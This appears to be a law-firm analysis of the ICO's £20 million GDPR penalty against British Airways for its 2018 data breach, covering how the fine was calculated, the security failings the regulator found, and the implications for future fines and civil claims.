An analysis of the Monetary Penalty Notice issued by the Information Commissioner's Office to British Airways plc dated 16 October 2020
On 16 October 2020, the ICO issued BA with a MPN, fining the airline £20 million for breaches of Articles 5(1)(f) and 322 of the GDPR in relation to a data breach in 2018.
Introduction
On 16 October 2020, the Information Commissioner's Office (the "ICO") issued British Airways plc (“BA”) with a Monetary Penalty Notice1 (the "MPN"), fining the airline £20 million for breaches of Articles 5(1)(f) and 322 of the General Data Protection Regulation3 (the "GDPR") in relation to a data breach in 2018 in which the personal data of around 430,000 of BA's customers was compromised by a hacker gaining access via systems used to permit staff/contractors to work remotely.
Whilst this is the largest fine imposed by the ICO to date, it is noteworthy that it only represents 11% of the £183.39 million fine proposed in the ICO’s Notice of Intent (“NOI”) dated 8 July 2019.
Aside from the headline-grabbing fine (and the extensive discussion regarding how it was reached), the MPN represents a helpful guide for organisations regarding how to ensure that they have "appropriate technical and organisational measures" in place to avoid regulatory sanctions where personal data is lost arising from unauthorised access to their IT systems.
Background
The data breach
The facts of the data breach, which occurred between 22 June and 5 September 2018, are, in overview:
- An attacker gained unauthorised access to BA’s IT systems through a Citrix remote access gateway (the "CAG") using the login details of an employee of Swissport, one of BA's contractors;
- Having gained access via the CAG, the attacker was able to access BA's wider IT infrastructure using methods, which as at the date of the MPN, had not been ascertained, and accessed a privileged domain administrator account;
- Thereafter, over a number of months, the attacker proceeded to exfiltrate various personal data, namely: (A) the cardholder data4 of approximately 430,000 BA customers by: (1) editing a Javascript file on BA's website to send customer payment card data to a separate website controlled by the attacker, "BAways.com"; and (2) accessing unencrypted log files; and (B) usernames and passwords/pin numbers of a more limited number of customers, employees and contractors; and
- On 5 September 2018, a third party informed BA that data was being exfiltrated from its website, and within a matter of hours, BA took the necessary steps to end the breach.
BA notified the ICO, affected data subjects, and acquirer banks and payment schemes, regarding the data breach the following day.
The ICO's regulatory response
Thereafter, the ICO commenced its investigation, issuing the NOI the following summer which threatened BA with a fine of £183.39 million on the basis that: "a variety of information was compromised by poor security arrangements at [BA]".
In response to the NOI, BA provided three5 sets of substantive written representations6 (on 5 September 2019, 31 January 2020, and 12 May 2020):
- Challenging the ICO's finding that BA had failed to put in place "appropriate technical and organisational measures" to prevent, and thereafter, detect, the breach; and
- In the latter case, informing the ICO of the impact that Covid-19 had had on BA’s financial position.
The basis on which the fine was calculated
No doubt, the question on the lips of even the most casual observer of this case is why the final penalty is almost 90% less than that proposed in the NOI a year ago.
A clear answer is not forthcoming in the MPN; it brushes over the issue and instead starts from scratch with the five-step approach outlined in the ICO’s Regulatory Action Policy (“RAP”)7.
The key factors on which the Commissioner relied in deciding the quantum of the fine in line with the RAP included:
- The fact that BA "did not gain any financial benefit, or avoid any losses, directly or indirectly as a result of the breach";
- The “serious” nature of BA’s failings8 in "processing a significant amount of personal data in an insecure manner"9;
- The substantial duration of the breach (103 days)10;
- The negligent (but not intentional) nature of BA's breaches of GDPR11;
- The fact that BA were “wholly responsible” for the breaches12;
- The absence of previous infringements on BA’s part;
- The full cooperation which BA gave to the ICO;
- The fact that, although no special category data was affected, financial data was compromised in the breach13; and
- BA's prompt notification of the breach to the ICO.
These factors contributed to the calculation of an initial fine of £30 million, which was then reduced by 6% to £24 million as a result of the following mitigating factors14.
- The immediate steps taken by BA to mitigate and minimise damage suffered by affected data subjects (for example, by offering to reimburse all financial losses which they had suffered and offering a free credit monitoring service);
- The prompt notification given to affected data subjects and the ICO;
- Widespread media reporting, which is likely to have increased awareness amongst other data controllers of the risks posed by cyber-attacks; and
- The adverse effect of the breach on BA’s brand and reputation15.
A further reduction of £4 million was made to reflect the impact of Covid-19 on BA's business16. The final total was therefore £20 million 17.
As noted above, the MPN does not spell out in clear terms the reasons for the significant reduction in the quantum of BA's fine from that envisaged in the NOI. However, the references to BA’s representations as summarised in the MPN and the Commissioner’s responses provide a number of clues.
It appears that, in reaching the £183.39 million figure in the NOI, the Commissioner had used an unpublished internal document entitled “Draft Internal Procedure for Setting and Issuing Monetary Penalties” (“DAP”), which used turnover as the central metric for calculating fines. The Commissioner backtracked prior to issuing a draft decision to BA, agreeing that “the DAP should not be used in the present case” and noting that “in deciding the appropriate penalty no reference has been made to the DAP”. Instead, “the Commissioner…relied on Article 83 GDPR, section 155 DPA and the RAP”.
A number of other comments made in the MPN are worth noting in respect of penalty calculations more generally:
- Contrary to BA’s submission that a turnover-based approach is a “fundamentally flawed” way of achieving proportionate and effective penalties, the MPN emphasises that turnover remains “a relevant metric for assessing whether any fine is proportionate and dissuasive”; it is “one key factor to be taken into account in the round, by reference to the particulars facts at issue in the case”18;
- The Commissioner rejected BA’s submission that there is a clear conflict between the maximum fines for breaches of Articles 5(1)(f) and 32 (on the basis that they impose the same obligations but attract different maximum fines). The two provisions are “evidently distinct provisions of the GDPR, notwithstanding the degree of overlap… there is no conflict”19; and
- The Commissioner resisted BA’s submission that the penalty regime lacks legal certainty and that the Commissioner: "should continue to apply penalties in a manner which is consistent with the approach adopted under the superseded DPA 1998 regime, or with the limited decisions or guidance issued to date by the other supervisory authorities under the GDPR"20. The Commissioner also pushed back on assertions that its investigation, the NOI, and the MPN were procedurally deficient in a number of ways21.
Appropriate technical/organisational measures
The extensive focus in the MPN on the calculation of the fine should not detract readers from carefully reviewing the useful guidance provided in the MPN in relation to the Commissioner's views on "appropriate technical and organisational measures". Taken together with other recent Monetary Penalty Notices (including those issued to Cathay Pacific Airways Limited, The Carphone Warehouse Limited, DSG Retail Limited and Equifax Limited), there is now a substantial body of practical guidance for organisations to rely upon when assessing the appropriateness of the "technical and organisational measures" they have in place.
In summary, the Commissioner concluded that: "between 25 May 2018, when the GDPR entered into force, and (at least) 5 September 2018, when BA took action to prevent the transfer of personal data to BAways.com… BA failed to process personal data in a manner that ensured appropriate security of the personal data, including protection against unauthorised or unlawful processing and against accidental loss, destruction or damage, using appropriate technical and organisational measures as required by Article 5(l)(f) and Article 32 GDPR" and that: "each step of the [a]ttack could have been prevented, or its impact mitigated, by BA implementing one or more of a range of appropriate measures that were open to it".
In the context of the MPN, the following points are of particular note:
- Initial access to the BA systems22: the Commissioner determined that BA should have considered the following factors in order to minimise the risk of the attacker gaining initial access to its systems: multi-factor authentication23; external public IP address whitelisting; and IPSec VPN.
- Supply chain management24: the Commissioner placed particular emphasis on BA's failure to mitigate the risks of a "supply chain attack" attendant in permitting contractors to access its IT infrastructure. The ICO also rejected BA's attempt to rely on a Third-Party System Access Agreement with Swissport which contained certain requirements on password protection to demonstrate that it had implemented appropriate "technical and organisational measures", noting that it does not consider "reliance on such agreements alone to be an effective measure in ensuring that Swissport user credentials, and the access they provided to BA's systems, were appropriately secured."
- Remote access25: the Commissioner determined that BA had not appropriately mitigated the risks associated with remote access which was the threat vector which was used by the attacker to access BA's wider IT infrastructure. Appropriate measures in this regard may have included: application whitelisting;26 application blacklisting; and application/server hardening.27 Given that many readers' organisations will now be working remotely, these measure should be carefully considered. The importance of penetration testing was also stressed; if it had been carried out, “many of the problems identified within [the] decision are likely to have been detected and appropriately addressed” and "security testing of the CAG and associated applications may have identified the ability to break out of the Citrix environment".28
- Privileged account management29: a key vulnerability identified by the Commissioner was the ease with which the attacker could obtain privileged account details (for example, details of the domain administrator account). This was largely due to the fact that these details were saved in an unencrypted plain text file (referred to as “hardcoding”). In line with previous Monetary Penalty Notices30, the Commissioner expressed serious concern about the storage of credentials in plain text, emphasising that this was neither standard practice nor an acceptable way of “aiding functionality”, as BA had tried to argue. The Commissioner found that, in any event, these risks may have been mitigated by monitoring access to the script in which the passwords were stored in plain text; requiring the input of credentials on execution of the script; and encrypting the script itself when not in use. The Commissioner also emphasised BA's failure to monitor attempts to access administrator accounts (the attacker had, in fact, failed to access an administrator account on a number of occasions prior to ultimately gaining access thereto), the use of guest accounts or the creation of additional administrator accounts, and to securely manage all privileged accounts across its IT infrastructure more generally (e.g. through monitoring and auditing their usage) as a matter of serious concern.
- Failure to appropriately manage its website31: the Commissioner identified that despite the fact that its website represented a significant threat vector, BA had failed to: review the website's code; put in place file integrity monitoring to detect changes to that code; or manual change management controls.
- Failure to adequately protect payment card data32: the Commissioner identified that BA's approach to logging such data was particularly deficient, arising (remarkably given the sensitivity of such data) from inadvertence on BA's part: "logging and storing of these card details (including, in most cases, CVV numbers) was not an intended design feature of BA's systems and was not required for any particular business purpose. It was a testing feature that was only intended to operate when the systems were not live, but which was left activated when the systems went live." This approach was in breach of both the Payment Card Industry Data Security Standard and GDPR.
- Breach detection33: the Commissioner emphasised the importance of logging in the breach detection process (for example, the use of a Security Information and Event Managing System).34 As noted above, the breach only came to BA's attention by virtue of a third party's intervention.
It is important to note that in making these findings, the Commissioner accepted that: "[n]ot every instance of unauthorised processing or breach of security will amount to a breach of Article 5 or Article 32" and that: "comprehensive monitoring of an IT estate as large as BA's may be a relatively complex task".
However, despite BA's protestations to the contrary, including that the attack was highly sophisticated, it considered that: "[t]he [a]ttack in this case was not of such a degree of sophistication as to negate BA's responsibilities for securing its system and the personal data processed within it. Many of the steps taken by the [a]ttacker were of a kind that could have been anticipated and addressed, as they were well-known means of attempting to exploit a system" and "BA failed to put in place these measures, which could have prevented, or at least alerted BA, to this [a]ttack". The Commissioner also considered BA's contention that, had certain of the deficiencies identified by the Commissioner been remedied, the attacker might nevertheless have adapted their strategy, to be unpersuasive.
Next steps
If BA wishes to appeal the MPN to the First Tier Tribunal, it must serve a notice of appeal by no later than 16 November 2020.
Comment
A portend of future regulatory sanctions?
Caution should be exercised in assuming that the reduced penalty imposed on BA, which, of course, remains substantial in absolute terms, can be taken either as an indicator of: (A) the level at which future fines might be set by the Commissioner; or (B) the approach applied in calculating this fine being adopted by the Commissioner in future cases35.
In October 2020, the ICO launched a public consultation on its draft statutory guidance on its regulation policy (the "Guidance").36 The Guidance, the publication of which appears at least in part to be motivated by the issuance of the MPN, sets out a different approach to calculating fines to that which was taken in the instant case; instead of the five steps (in line with RAP), the draft sets out a nine step approach, with fines, in the first instance, being calculated in accordance with turnover as follows:
Had the Guidance been applied in relation to BA, the starting point for the penalty would have been significantly higher than £30 million, and would, in fact, have been in line with the fine of £183.39 million proposed in the NOI37. Accordingly, if the Guidance is finalised in its current form, the spectre of fines running to hundreds of millions of pounds still looms large.
Regardless of whether the Guidance is ultimately adopted, the reduced fine which BA achieved highlights the benefits of organisations faced with a serious data breach of:
- Promptly reporting the breach to the ICO and affected data subjects;
- Fully engaging with the ICO throughout any investigation and, as appropriate, following a Notice of Intent being issued;
- Promptly addressing deficiencies in "technical and organisational measures" which have become apparent by virtue of the data breach38; and
- Robustly challenging the findings in any Notice of Intent ultimately issued. Had BA adopted a more passive approach, it may have been left facing a fine running into the hundreds of millions.
Civil claims against BA
Despite the findings in the MPN, BA's position remains, of course, that it was not in breach of its obligations under Articles 5(1)(f) and 32 GDPR. However, given the fact that the MPN sets out in great detail why BA's position is untenable in this regard, notwithstanding that the Commissioner's decision does not bind BA in the various sets of civil proceedings arising out of the data breach which are presently afoot against BA, it is going to have an uphill struggle in contesting liability in those proceedings.
In the instant case, if BA elects not to appeal and assuming that all affected customers pursue claims against BA, its liability from those proceedings could well be more than double that deriving from the MPN.
This is likely to be reflective of a wider trend, with the losses from civil claims arising out of data breaches potentially eclipsing those deriving from regulatory sanctions, even where those sanctions are calculated by reference to the Guidance if it is finalised in its current form39.
1 As the data breach occurred in June 2018, before the UK left the EU, the ICO investigated on behalf of all EU authorities as lead supervisory authority under the GDPR. Accordingly, the MPN was approved by the other relevant Supervisory Authorities pursuant to Article 60 GDPR.
2 The fact that claims were pursued for breaches of both provisions is important. A breach of Article 32 only engages a fine of "up to €10 million or, in the case of an undertaking, up to 2% of its total worldwide annual turnover of the preceding financial year, whichever is higher", whereas a breach of Article 5 engages a fine of “ up to €20 million or, in the case of an undertaking, up to 4% of its total worldwide annual turnover of the preceding financial year, whichever is higher".
4 Namely, the customers' names, addresses, card numbers, CVV numbers and card expiry dates.
5 At law BA was limited to making a single set of representations. However, the Commissioner agreed to permit further representations to be made: "having regard, in particular, to: (i) the complexity of the case, (ii) BA's representations, and (iii) the fact that this is one of the first major decisions made under the new EU data protection regime".
6 It also provided various responses to queries raised by the ICO regarding facts and matters emerging from BA's written representations.
7 Namely:
- Step 1. An ‘initial element’ removing any financial gain from the breach.
- Step 2. Adding in an element to censure the breach based on its scale and severity, taking into account the considerations identified at section 155(2)-(4) of the DPA.
- Step 3. Adding in an element to reflect any aggravating factors.
- Step 4. Adding in an amount for deterrent effect to others.
- Step 5. Reducing the amount (save that in the initial element) to reflect any mitigating factors, including ability to pay (financial hardship).
8 See paragraphs 7.9 – 7.16 of the MPN.
9 It is noteworthy that in assessing this issue, the Commissioner rejected BA's rather hopeful submissions that:
- "the payment card details are the only data which could arguably have any degree of sensitivity. Attackers may exploit combinations of names, usernames and passwords to exploit data subjects";
- It is "inherently unlikely” that consumers will be distressed by learning their payment card data or other personal information has been compromised;
- "payment card breaches, at least of the type involved here, are "an entirely commonplace phenomenon" and therefore an "unavoidable fact of life"".
The Commissioner also emphasised that contrary to BA's submission that only customers whose CVV numbers had been compromised would have suffered financial loss: "By way of example, some retailers (such as Amazon) accept card payment without CVV numbers. In any event, individuals are likely to have been distressed by the fact that their personal data had been used unlawfully."
10 The Commissioner accepted BA's submission that the breach should be assessed as at the date the attack ended, rather than the date on which it had remedied the issues giving rise to the breach (16 November 2018). With regard to the start date, the Commissioner noted: "this penalty decision only takes into account failures under the GDPR during the period between 25 May 2018 and 5 September 2018, it is clear that the deficiencies in BA's systems were present for some time" (it could, in principle, have separately fined BA for breaches of the Data Protection Act 1998 in relation to events prior to the GDPR coming into force).
11 See paragraphs 7.17 – 7.23 of the MPN. The Commissioner emphasised in this regard that it had placed: "some weight on the relevant context: a company of the size and profile of BA is expected to be aware that it is likely to be targeted by attackers, sophisticated or otherwise" and the fact that: "BA put in place a programme to prepare its systems for the introduction of the GDPR. However, that programme failed to identify and address the deficiencies in BA's security that were highlighted by the [a]ttack".
12 See paragraphs 7.26 – 7.29 of the MPN.
13 See paragraphs 7.32 – 7.34 of the MPN.
14 See paragraphs 7.35 – 7.53 of the MPN.
15 It is noteworthy in this regard that the Commissioner rejected BA's submission that it: "should take into account in determining whether a fine should be increased to secure a deterrent effect that a controller may have suffered reputational damage / exposure to civil claims as a result of its infringement of the GDPR. Moreover, the Commissioner does not accept that as a matter of general principle concerns about deterrent effect should be limited to deliberate breaches. It is also important to deter data controllers from acting negligently" and that it was not: "appropriate to reduce the penalty by reference to the costs to BA of taking measures to rectify or mitigate the impact of its infringement, including the cost to BA of appointing external forensic consultants or legal advisers".
16 The Commissioner noting: "[a]lthough the Covid-19 pandemic has had a significant short to medium term impact on BA's revenues and its immediate financial position, the Commissioner considers that the overall financial position of BA and its parent company IAG is such that the imposition of a penalty in the range being considered will not cause financial hardship."
17 This total may not have come as a surprise to those eagle-eyed observers who noticed that the IAG Group’s Interim Management Statement for the six months up to 30 June 2020 made provision for an “exceptional expense of EUR22 million… in relation to the theft of customer data at British Airways in 2018”.
18 See paragraphs 7.67 – 7.76 of the MPN.
19 See paragraphs 7.77 – 7.83 of the MPN.
20 See paragraphs 7.95 – 7.123 of the MPN.
21 See paragraphs 7.124 – 7.154 of the MPN.
22 See paragraphs 6.10 – 6.29 of the MPN.
23 See also page 11 of the Monetary Penalty Notice in respect of Cathay Pacific Airways Limited, available here. Remarkably in this case multi-factor authentication had not been implemented despite the fact that: "BA's own Network Access Control Policy of 7 October 2017 states: "Multi-factor authentication shall be incorporated for all remote network access (both user and administrator, and including third-party access for support or maintenance) originating from outside the network"
24 See paragraphs 6.10-6.29 of the MPN.
25 See paragraphs 6.30-6.56 of the MPN.
26 See also page 11 of the Monetary Penalty Notice in respect of DSG Retail Limited.
27 See also page 11 of the Cathay Pacific Monetary Penalty Notice.
28 See also: page 9 of the Monetary Penalty Notice in respect of The Carphone Warehouse Limited, available here:; page 11 of the DSG Retail Monetary Penalty Notice; and page 14 of the Cathay Pacific Monetary Penalty Notice.
29 See paragraphs 6.57-6.80 of the MPN.
30 See also page 13 of the Cathay Pacific Monetary Penalty Notice. Here, the Commissioner noted that no day-to-day user accounts should be in the domain administrator group save for the built-in administrator account for the domain; that each account should only be given the tools it needs to perform its own administrative tasks; and that permissions should be afforded for a limited period, not on a permanent basis.
31 See paragraphs 6.84 – 6.88 of the MPN.
32 See paragraph 3.22 of the MPN.
33 See paragraphs 6.81 – 6.84 of the MPN.
34 See also page 9 of the Carphone Warehouse Monetary Penalty Notice, where the Commissioner stated that: log files should be activated for each system processing personal data; logs should cover the actions of both system operators and administrators and should be timestamped and protected against unauthorised modification and deletion; and a monitoring system should be in place to process log files and generate reports on the status of the system and provide alerts in the event of an internal or external system violation.
35 Readers should note that this is likely also to be the case in relation to the Monetary Penalty Notice which will ultimately be issued to Marriott International, Inc, ("Marriott") which we anticipate will be similarly reduced from the £99 million fine threatened in the Notice of Intent issued by the ICO given that that fine is also likely to have been calculated by reference to the DAP (particularly as Marriott International will now have had an opportunity to crib from BA's submissions, in particular in relation to the DAP).
37 See page 23 of the draft consultation. This calculation is based on the following assumptions: that the seriousness of the infringement is classified as “high”; that the breach was a product of negligence; that the higher maximum amount would be 4%. In the instant case the Commissioner described BA's infringements as: "a serious failure to comply with the GDPR".
38 In BA's case, the Commissioner notes: "BA implemented additional technical measures, including a next-generation anti-virus and endpoint detection and response tool, called "Crowdstrike Falcon".
39 By way of more extreme example, Marriott is currently facing a claim brought as a representative action on behalf of 339 million of affected data subjects, which, could (at least in theory) leave it facing a fine running to hundreds of billions of pounds (i.e.. a thousand times the fine threatened in the Notice of Intent referred to above and more than five times its annual revenue ($20.97bn in 2019).